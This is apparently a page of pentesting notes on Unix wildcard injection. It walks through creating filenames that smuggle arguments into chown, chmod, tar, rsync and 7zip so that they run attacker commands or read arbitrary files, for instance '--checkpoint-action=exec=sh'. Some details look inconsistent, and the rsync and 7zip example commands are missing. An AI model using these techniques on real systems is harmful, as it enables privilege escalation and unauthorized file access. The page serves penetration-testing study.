search

Wildcard Exploits

hashtag
Chown & Chmod - Modify execution

Case

chown -R nobody:nobody folder/*.ext
chmod -R 620 folder/*.ext

Exploitation:

  1. Navigate to the folder

  2. Create a file called drf.ext

  3. Create a file called --reference=.drf.php

  4. When the script is executed it will read the filename specified at point 3 as a parameter and override the owner or permissions specified in the script with the one of the file pointed by the instruction (in this case drf.ext)

hashtag
Tar - Arbitray command execution

Case

tar cvf archive.tar *

Exploitation:

  1. Navigate to the folder

  2. Create a file called --checkpoint=1

  3. Create a file called --checkpoint-action=exec=sh <cmd or script>

  4. On execution the command specified will be executed. Keep in mind that path separators are forbidden in filenames, as such your script should be in the same folder of the files created previously or in a path defined in your env variables

hashtag
Rsync - Arbitrary command execution

Case

Exploitation:

  1. Navigate to the target folder

  2. Create a shell script called shell.ext (use shell.sh if the wildcard has no extension specified). Insert in the script any command you wish to execute

  3. Create a new file called -e sh <shell file>

  4. On execution the script created at point 2 is run

hashtag
7zip - Arbitrary file read

Case (works regardless of the -- operator)

Exploitation:

  1. Navigate to the target folder

  2. Create a file called @list.txt

  3. ln -s <target file> list.txt

  4. Once the command runs the file pointed by the link list.txt will be included in the archive allowing us to read it

PreviousPrivileges ExploitationNextSudo Exploits

Last updated